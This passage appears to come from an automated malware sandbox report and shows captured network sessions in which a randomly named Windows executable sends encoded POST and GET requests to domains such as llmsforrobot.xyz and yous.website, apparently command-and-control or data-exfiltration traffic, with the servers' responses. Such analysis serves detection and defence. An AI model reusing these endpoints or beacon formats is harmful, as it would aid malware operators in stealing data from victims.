                                                                                                                                                                                                                                              Data Ascii: QzkZNSQz3DPO7cPfdTiYsh4QaT4Cn8FceQUtjABB5+qE1lVI32PO/gwAWV1kQU+KsgqF7dr4YXvoqksLrLCUshQ/AGE+cS4NAypAoKhzIzU2bM8yOAZH4+IERAK7JT9Vjc1NbV3tN1D/tvWa8s7EHR6Kd16nMLdJHxhaJKGNjUJ0OolGPTVNx5I/Vd2JFo5/eGVukxA7t749KPrLuYgIlfs3G+dIgHJzmIDSCO9BEcFFFEqW1zp
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138402939 CET1236INData Raw: 4f 45 56 71 6c 53 77 54 53 4c 67 4f 46 49 54 78 4e 72 61 6e 42 67 44 4d 58 45 69 33 47 76 56 35 4b 32 75 70 62 34 57 6e 47 59 51 33 37 4c 35 65 59 36 67 30 32 30 55 37 6f 38 2b 56 65 4c 6d 73 33 41 4d 37 69 34 69 58 6a 45 6a 78 59 4a 51 46 39 6f
                                                                                                                                                                                                                                              Data Ascii: OEVqlSwTSLgOFITxNranBgDMXEi3GvV5K2upb4WnGYQ37L5eY6g020U7o8+VeLms3AM7i4iXjEjxYJQF9o7j00GBKqUCEiLCmT0m2sHkWqhN/xcB5EYO63viYi9385pPDCslAGGKmKh62KZrg1cZCiiBUZbNA78nhWSmztmU0yBCBuhOCJL1E/AQD8LSohi1SUdtpLKoFeW1Jrk0adK4OktzGvUIkbzTGaWcTxQF9bvBxCnFD0+
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138437986 CET1236INData Raw: 32 42 4e 6a 6f 78 30 54 4c 76 74 72 2b 70 66 43 79 41 57 76 37 53 4f 4c 39 31 47 4a 56 6c 2b 5a 4c 7a 33 33 68 34 36 34 44 74 6b 41 49 48 54 47 6d 46 65 31 55 53 4b 79 57 4e 46 49 59 6d 43 6b 76 76 31 70 61 38 76 35 5a 4c 42 6e 44 70 64 56 6c 64
                                                                                                                                                                                                                                              Data Ascii: 2BNjox0TLvtr+pfCyAWv7SOL91GJVl+ZLz33h464DtkAIHTGmFe1USKyWNFIYmCkvv1pa8v5ZLBnDpdVld30Yj1ZYARIc1ScAcYCwHBinMYUFepS4xeRViH7rGmCAhsBEU2OQPJCSJNtnJqxV8sKC8tLT9la7aQz3y4kdBQiTjyFNUpBzFp3hABXeDgewEEVQiZkoMDWWuPOgX9wNAb9/44dKDlk9s6EGRafyGnpZCJFI/RpA+2
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138473988 CET1236INData Raw: 59 53 69 52 46 62 49 68 34 48 49 68 46 42 65 67 73 63 53 51 49 36 74 6a 47 79 63 55 4a 4a 31 72 2b 32 6a 55 4d 2b 62 45 55 42 75 48 45 4c 53 51 2b 56 36 37 78 58 61 4a 70 54 4f 35 49 72 67 51 53 57 47 65 48 53 4f 61 73 52 7a 68 58 69 45 38 6a 31
                                                                                                                                                                                                                                              Data Ascii: YSiRFbIh4HIhFBegscSQI6tjGycUJJ1r+2jUM+bEUBuHELSQ+V67xXaJpTO5IrgQSWGeHSOasRzhXiE8j1aQIBZKInVLMRjVWhhqVQcYCLMJJREA4VTDESE9uQAg9wK3hBiUGOj7Thw8KEU0W7UjMQUZSAKs/SR0DpBMYkb8IFQp3qLYrIZ0UUA6YwAsh5A3kYVdDArEgiIvHnCRcUhaEzCpCMcyml6r5/WeIBI4RVYCgyFbxHC
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.258219004 CET1236INData Raw: 53 44 5a 41 43 61 52 57 42 59 75 4e 4d 79 6c 62 69 6c 34 6b 46 5a 64 45 4e 6f 42 4b 50 42 66 45 44 63 53 6a 4a 30 51 6b 54 69 38 48 36 63 59 69 4e 48 39 42 5a 47 4e 52 49 52 63 56 6f 6d 74 74 37 79 38 76 4c 65 32 61 61 4f 58 65 5a 30 53 68 6f 31
                                                                                                                                                                                                                                              Data Ascii: SDZACaRWBYuNMylbil4kFZdENoBKPBfEDcSjJ0QkTi8H6cYiNH9BZGNRIRcVomtt7y8vLe2aaOXeZ0Sho1hs3wGQjtrkb3YysWTXvFdn2CicdmEJNjQpi3inoD8T31kJwtlCIi82SMP05JhdFgfRstXJzA5FXTfoSvQWfThDW24XKh7sIkEG1kqsrAdFwyteXn5ecEEOwyeEJFkIjKlQIz0V3IGHUSkqbb8Dpq/aP2i92uVnLgU


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              3192.168.2.449766192.30.252.154804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:27.709068060 CET10803OUTPOST /033w/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.llmsforrobot.xyz
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.llmsforrobot.xyz
                                                                                                                                                                                                                                              Referer: http://www.llmsforrobot.xyz/033w/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 10300
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 70 62 58 34 54 48 5a 46 7a 2f 6e 66 47 7a 52 72 37 79 4a 54 74 55 34 46 4a 64 70 78 48 38 49 42 42 76 70 35 54 46 6d 67 35 32 4a 70 72 69 44 49 41 42 70 30 68 49 69 75 4c 57 4f 55 71 33 76 4d 34 46 31 41 36 2b 78 31 47 42 75 6e 35 44 4b 75 36 79 79 78 67 77 57 47 59 45 44 47 57 74 61 38 46 44 34 6e 56 4b 6e 7a 57 2b 59 4b 4c 58 52 6f 37 30 7a 69 76 50 6f 41 47 52 70 67 5a 41 45 6d 34 51 4f 47 70 63 34 58 38 31 66 79 55 61 62 6c 62 75 67 47 35 38 47 79 59 4f 37 74 67 49 4b 55 36 52 64 51 30 51 65 63 43 71 46 39 6b 44 45 55 69 68 52 75 43 6a 59 65 38 37 6e 38 39 48 75 4f 39 7a 51 77 4d 6c 41 50 66 70 6f 77 6d 50 5a 4e 4f 4a 72 69 2b 6e 71 39 6d 73 52 30 43 54 75 4c 70 67 45 42 38 48 30 34 42 31 33 62 68 36 4c 68 56 6b 53 70 39 4d 78 35 6a 30 6d 70 63 63 6f 78 45 51 68 58 52 77 69 49 46 39 43 48 67 7a 4f 43 37 4b 73 64 72 7a 4c 6f 53 55 38 30 57 70 34 65 67 75 74 65 77 57 34 4d 6d 4f 4f 72 71 56 32 76 42 69 71 64 71 33 73 63 7a 53 73 45 37 31 6c 71 61 6e 75 34 47 73 79 6c 43 79 62 74 46 4b [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 4v7=pbX4THZFz/nfGzRr7yJTtU4FJdpxH8IBBvp5TFmg52JpriDIABp0hIiuLWOUq3vM4F1A6+x1GBun5DKu6yyxgwWGYEDGWta8FD4nVKnzW+YKLXRo70zivPoAGRpgZAEm4QOGpc4X81fyUablbugG58GyYO7tgIKU6RdQ0QecCqF9kDEUihRuCjYe87n89HuO9zQwMlAPfpowmPZNOJri+nq9msR0CTuLpgEB8H04B13bh6LhVkSp9Mx5j0mpccoxEQhXRwiIF9CHgzOC7KsdrzLoSU80Wp4egutewW4MmOOrqV2vBiqdq3sczSsE71lqanu4GsylCybtFKgMmCg1AGUjb0pgc7DbicDXxkWU7nHwOM1LRcTnHv2HIwAlG3331tzJSUD3TW7zSZFwHIL7IJNP1zxu4P1v1Pq+w9c857NntvraBPAxY261BcV3sB02wRtoRjgAZU2ix8+PxgpRYz4yjv0M5bIi0nw7xq0xQ/n+6eEIzNab76fiezukyPfKMwVe2fRmruZAjKIjXG3dn8Ma2Qz/S9hj1lLgdoI0BX5NZYNzUD6yehKeyWop4H14kmKdPfFq+H421jNQ+VlgWm63pZVHVFDVeAHWSlWJWjX+auIW5BYO3jPXYWHyDL9zlK+i449yojJKFY3YksQWKj5PEDAZJLRFstxaiVKPZ6+g1OYilBauqtDZmZMwiw6aGWR6sxEVY7pCkn1Pa/4ZQJlYVonBqWb021C6gdU1QqY7Uiv85vPGwSpN1Fx4lWXuAafuwr1iio6fjsXHtfGLFwrGY7WJ/xCx1GxduwcifPD/it2wp0Y+mxwK6ONeryDoLyCX4CnSaRB77Acm2warv3o6n6Od9fHqTisshHTLqW9rDX8WjEG4jnU2s2JzvfUzgzAF9D3LhKpYM8cXyAGEOu2h2RU5iFbZ1Ecx5D3eMcm6i/uk0TMDEKz+nq5LSDe8CwsHtPpnhfpxXXGEkpkwkNj7vCF3X50G1oVdEJcXxmrsYnL6 [TRUNCATED]
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793070078 CET1236INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: deny
                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:;
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 0d 0a 0d 0a 48 65 6c 6c 6f 20 66 75 74 75 72 65 20 47 69 74 48 75 62 62 65 72 21 20 49 20 62 65 74 20 79 6f 75 27 72 65 20 68 65 72 65 20 74 6f 20 72 65 6d 6f 76 65 20 74 68 6f 73 65 20 6e 61 73 74 79 20 69 6e 6c 69 6e 65 20 73 74 79 6c 65 73 2c 0d 0a 44 52 59 20 75 70 20 74 68 65 73 65 20 74 65 6d 70 6c 61 74 65 73 20 61 6e 64 20 6d 61 6b 65 20 27 65 6d 20 6e 69 63 65 20 61 6e 64 20 72 65 2d 75 73 61 62 6c 65 2c 20 72 69 67 68 74 3f 0d 0a 0d 0a 50 6c 65 61 73 65 2c 20 64 6f 6e 27 74 2e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 74 79 6c 65 67 75 69 64 65 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2e 30 0d 0a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 55 6e 69 63 6f 72 6e 21 20 26 6d 69 64 64 6f 74 3b 20 47 69 74 48 75 62 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html>...Hello future GitHubber! I bet you're here to remove those nasty inline styles,DRY up these templates and make 'em nice and re-usable, right?Please, don't. https://github.com/styleguide/templates/2.0--><html> <head> <title>Unicorn! &middot; GitHub</title> <style type="text/css" media="screen"> body { background-color: #f1f1f1; margin: 0; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; } .container { margin: 50px auto 40px auto; width: 600px; text-align: center; } a { color: #4183c4; text-decoration: none; } a:hover { text-decoration: underline; } h1 { letter-spacing: -1px; line-height: 60px; font-size: 60px; font-weight: 100; margin: 0px; text-shadow: 0 1px 0 #fff; } p { color: rgba(0, 0, 0, 0.5); margin: 10px 0 10px; font-size: 18px; font-weight: 200; line-heig
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793143988 CET1236INData Raw: 68 74 3a 20 31 2e 36 65 6d 3b 7d 0d 0a 0d 0a 20 20 20 20 20 20 75 6c 20 7b 20 6c 69 73 74 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 20 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 6c
                                                                                                                                                                                                                                              Data Ascii: ht: 1.6em;} ul { list-style: none; margin: 25px 0; padding: 0; } li { display: table-cell; font-weight: bold; width: 1%; } .logo { display: inline-block; margin-top: 35px; } .logo-img-2x { display: none; }
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793183088 CET1236INData Raw: 44 2b 4b 41 44 36 41 78 43 4e 71 77 6f 58 31 5a 69 61 77 6f 39 4c 59 6e 47 75 77 68 4c 37 61 69 77 61 49 79 59 75 64 73 74 36 44 6c 72 6e 68 63 57 76 43 63 56 76 6c 62 45 39 50 76 73 4c 32 75 33 75 59 6d 64 43 5a 75 6d 39 52 6e 73 37 63 6c 55 59
                                                                                                                                                                                                                                              Data Ascii: D+KAD6AxCNqwoX1Ziawo9LYnGuwhL7aiwaIyYudst6DlrnhcWvCcVvlbE9PvsL2u3uYmdCZum9Rns7clUYsreOYp2nuj37kiZLUfqhvxafqfmrNWEjA22uz1Vu6lsiRAArWhLfgdoONnF36rWrzpz/ajy/LbqR8pdWDVXx8faN6m0+6hE3+1pmHP2mTy1b4k1p/ueFlj7vMfzyBs1v/2GfLpFL5rQD+7teQABj4n0/rpCz6r1Z8
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793219090 CET1236INData Raw: 7a 51 67 34 4a 48 4b 6d 43 66 74 42 79 42 2f 48 38 6f 30 67 59 63 2f 35 49 6e 2f 41 63 68 6a 4b 54 4d 7a 31 75 59 78 4c 38 33 76 6c 78 68 4c 2f 77 48 49 59 2f 48 41 4c 62 59 34 4d 68 49 43 6a 44 48 2f 4d 30 39 74 47 51 49 67 30 34 67 6a 49 77 30
                                                                                                                                                                                                                                              Data Ascii: zQg4JHKmCftByB/H8o0gYc/5In/AchjKTMz1uYxL83vlxhL/wHIY/HALbY4MhICjDH/M09tGQIg04gjIw0HzhQ7HJlpIY+kuCVPwlNrIAAynUQSslNxFwvXB6xzU2YF/JJTYu7A0xvTpxnInIAnLoMi8RPIZOKRKD1tJnDITrPVEfLP+QHI4/WcMmf5A+ZUHNMngQFlpCRIwOF2SOb1FZJ/5twfgDx2TR3ye2bj0eOwEDAy01MS
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793276072 CET1236INData Raw: 55 34 72 42 55 2b 71 4b 56 67 69 76 59 5a 33 65 47 55 46 63 44 77 4b 44 37 74 56 41 67 36 5a 51 67 32 4a 50 79 63 65 37 61 78 59 6e 32 39 46 4e 65 2f 6d 33 73 75 63 6c 4a 77 79 4a 77 4f 32 45 69 56 6b 31 34 6e 6b 4a 4f 6d 66 4d 57 31 41 5a 67 66
                                                                                                                                                                                                                                              Data Ascii: U4rBU+qKVgivYZ3eGUFcDwKD7tVAg6ZQg2JPyce7axYn29FNe/m3suclJwyJwO2EiVk14nkJOmfMW1AZgf8ocS0dEIyHZUIB8L2b91PcV2hxrmJv5L+jAcZmCPE1o89Eg6o0mzBj0eHGsEFUCoZvJfT6UXu5Q/NSkpOS0mdk56eQUqfk4oWALJranb6zXOnEUjIT9mhFJf6/TsuHHYGuQkIEdnEhImQfZjBQ3GaKxsfFQdKQgt+
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793313026 CET1236INData Raw: 52 36 58 37 39 70 37 6f 53 74 58 4f 6a 70 4f 46 79 4d 50 4a 72 57 33 34 31 55 56 52 69 4f 6e 63 66 6e 79 61 71 76 67 49 58 6d 53 49 30 61 47 76 35 75 65 33 4c 70 6d 30 47 39 41 65 61 5a 49 62 4b 4f 74 6f 41 74 49 53 71 2f 41 53 4a 6a 62 48 30 69
                                                                                                                                                                                                                                              Data Ascii: R6X79p7oStXOjpOFyMPJrW341UVRiOncfnyaqvgIXmSI0aGv5ue3Lpm0G9AeaZIbKOtoAtISq/ASJjbH0iKSXA3PRSIIoAc21q1EomvU3NY9tZj9ZHNEU7L0tjPDQbfar0VHFeoVkfSXFvbvnNcRcKhgMrp06cuXqQVYA6jkf4I12IMaTMuf3JaMjQ7LX5Ohuk7M8ESzpOupMzQFopkybnRdrm87c69e+XNRU4qkGJjJCbTg4Eo
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793349981 CET1236INData Raw: 51 7a 6b 5a 4e 53 51 7a 33 44 50 4f 37 63 50 66 64 54 69 59 73 68 34 51 61 54 34 43 6e 38 46 63 65 51 55 74 6a 41 42 42 35 2b 71 45 31 6c 56 49 33 32 50 4f 2f 67 77 41 57 56 31 6b 51 55 2b 4b 73 67 71 46 37 64 72 34 59 58 76 6f 71 6b 73 4c 72 4c
                                                                                                                                                                                                                                              Data Ascii: QzkZNSQz3DPO7cPfdTiYsh4QaT4Cn8FceQUtjABB5+qE1lVI32PO/gwAWV1kQU+KsgqF7dr4YXvoqksLrLCUshQ/AGE+cS4NAypAoKhzIzU2bM8yOAZH4+IERAK7JT9Vjc1NbV3tN1D/tvWa8s7EHR6Kd16nMLdJHxhaJKGNjUJ0OolGPTVNx5I/Vd2JFo5/eGVukxA7t749KPrLuYgIlfs3G+dIgHJzmIDSCO9BEcFFFEqW1zp
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793384075 CET1236INData Raw: 4f 45 56 71 6c 53 77 54 53 4c 67 4f 46 49 54 78 4e 72 61 6e 42 67 44 4d 58 45 69 33 47 76 56 35 4b 32 75 70 62 34 57 6e 47 59 51 33 37 4c 35 65 59 36 67 30 32 30 55 37 6f 38 2b 56 65 4c 6d 73 33 41 4d 37 69 34 69 58 6a 45 6a 78 59 4a 51 46 39 6f
                                                                                                                                                                                                                                              Data Ascii: OEVqlSwTSLgOFITxNranBgDMXEi3GvV5K2upb4WnGYQ37L5eY6g020U7o8+VeLms3AM7i4iXjEjxYJQF9o7j00GBKqUCEiLCmT0m2sHkWqhN/xcB5EYO63viYi9385pPDCslAGGKmKh62KZrg1cZCiiBUZbNA78nhWSmztmU0yBCBuhOCJL1E/AQD8LSohi1SUdtpLKoFeW1Jrk0adK4OktzGvUIkbzTGaWcTxQF9bvBxCnFD0+
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793421030 CET1236INData Raw: 32 42 4e 6a 6f 78 30 54 4c 76 74 72 2b 70 66 43 79 41 57 76 37 53 4f 4c 39 31 47 4a 56 6c 2b 5a 4c 7a 33 33 68 34 36 34 44 74 6b 41 49 48 54 47 6d 46 65 31 55 53 4b 79 57 4e 46 49 59 6d 43 6b 76 76 31 70 61 38 76 35 5a 4c 42 6e 44 70 64 56 6c 64
                                                                                                                                                                                                                                              Data Ascii: 2BNjox0TLvtr+pfCyAWv7SOL91GJVl+ZLz33h464DtkAIHTGmFe1USKyWNFIYmCkvv1pa8v5ZLBnDpdVld30Yj1ZYARIc1ScAcYCwHBinMYUFepS4xeRViH7rGmCAhsBEU2OQPJCSJNtnJqxV8sKC8tLT9la7aQz3y4kdBQiTjyFNUpBzFp3hABXeDgewEEVQiZkoMDWWuPOgX9wNAb9/44dKDlk9s6EGRafyGnpZCJFI/RpA+2
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793457985 CET1236INData Raw: 59 53 69 52 46 62 49 68 34 48 49 68 46 42 65 67 73 63 53 51 49 36 74 6a 47 79 63 55 4a 4a 31 72 2b 32 6a 55 4d 2b 62 45 55 42 75 48 45 4c 53 51 2b 56 36 37 78 58 61 4a 70 54 4f 35 49 72 67 51 53 57 47 65 48 53 4f 61 73 52 7a 68 58 69 45 38 6a 31
                                                                                                                                                                                                                                              Data Ascii: YSiRFbIh4HIhFBegscSQI6tjGycUJJ1r+2jUM+bEUBuHELSQ+V67xXaJpTO5IrgQSWGeHSOasRzhXiE8j1aQIBZKInVLMRjVWhhqVQcYCLMJJREA4VTDESE9uQAg9wK3hBiUGOj7Thw8KEU0W7UjMQUZSAKs/SR0DpBMYkb8IFQp3qLYrIZ0UUA6YwAsh5A3kYVdDArEgiIvHnCRcUhaEzCpCMcyml6r5/WeIBI4RVYCgyFbxHC
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.913270950 CET1236INData Raw: 53 44 5a 41 43 61 52 57 42 59 75 4e 4d 79 6c 62 69 6c 34 6b 46 5a 64 45 4e 6f 42 4b 50 42 66 45 44 63 53 6a 4a 30 51 6b 54 69 38 48 36 63 59 69 4e 48 39 42 5a 47 4e 52 49 52 63 56 6f 6d 74 74 37 79 38 76 4c 65 32 61 61 4f 58 65 5a 30 53 68 6f 31
                                                                                                                                                                                                                                              Data Ascii: SDZACaRWBYuNMylbil4kFZdENoBKPBfEDcSjJ0QkTi8H6cYiNH9BZGNRIRcVomtt7y8vLe2aaOXeZ0Sho1hs3wGQjtrkb3YysWTXvFdn2CicdmEJNjQpi3inoD8T31kJwtlCIi82SMP05JhdFgfRstXJzA5FXTfoSvQWfThDW24XKh7sIkEG1kqsrAdFwyteXn5ecEEOwyeEJFkIjKlQIz0V3IGHUSkqbb8Dpq/aP2i92uVnLgU


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              4192.168.2.449772192.30.252.154804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:30.362442017 CET427OUTGET /033w/?4v7=kZ/YQzY58uTPDy1SllACl2sKF+E3DMV6CvFnNkvZwHFDq3DsFBZ82/i3KTvXvlfgnzlAmNdsBQySpwa+g3edi3aCFGjCcomWBBYIDruBe4sqSy428ijZjbg=&pRel=chN0 HTTP/1.1
                                                                                                                                                                                                                                              Host: www.llmsforrobot.xyz
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:31.454972982 CET553INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                              Server: GitHub.com
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:08:31 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                                              Location: http://llmsforrobot.xyz/033w/?4v7=kZ/YQzY58uTPDy1SllACl2sKF+E3DMV6CvFnNkvZwHFDq3DsFBZ82/i3KTvXvlfgnzlAmNdsBQySpwa+g3edi3aCFGjCcomWBBYIDruBe4sqSy428ijZjbg=&pRel=chN0
                                                                                                                                                                                                                                              X-GitHub-Request-Id: 21C8:186F5B:4594E2C:4CD1E16:6768D42F
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              5192.168.2.449788209.74.79.40804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:37.136024952 CET689OUTPOST /sd58/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.yous.website
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.yous.website
                                                                                                                                                                                                                                              Referer: http://www.yous.website/sd58/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 200
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 6e 64 6f 74 2f 64 54 75 73 32 2f 68 33 73 68 6e 33 38 4d 5a 2f 4f 2f 6e 77 59 75 37 4e 45 4a 41 73 44 51 30 77 5a 49 75 48 59 56 70 33 68 47 70 43 43 7a 4b 71 72 2b 77 59 77 62 5a 76 36 42 35 75 44 4e 36 71 48 6d 62 51 43 36 72 68 66 79 78 79 42 37 76 79 4d 6c 69 4b 49 63 39 5a 57 61 6b 68 47 51 62 2f 7a 6c 4a 49 6f 2f 2f 6c 54 44 6a 2b 49 2b 4e 4a 50 32 71 55 38 71 6f 67 63 67 7a 42 72 2f 42 38 4e 38 39 6e 46 4a 73 47 76 78 71 77 59 59 47 65 6e 67 56 59 5a 46 78 49 67 67 49 31 38 74 76 59 6b 42 55 69 6e 35 70 32 6f 6d 6f 64 68 51 6d 4d 52 46 42 73 4c 57 63 37 55 37 69 68 41 3d 3d
                                                                                                                                                                                                                                              Data Ascii: 4v7=ndot/dTus2/h3shn38MZ/O/nwYu7NEJAsDQ0wZIuHYVp3hGpCCzKqr+wYwbZv6B5uDN6qHmbQC6rhfyxyB7vyMliKIc9ZWakhGQb/zlJIo//lTDj+I+NJP2qU8qogcgzBr/B8N89nFJsGvxqwYYGengVYZFxIggI18tvYkBUin5p2omodhQmMRFBsLWc7U7ihA==
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:38.333717108 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:08:38 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              6192.168.2.449797209.74.79.40804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
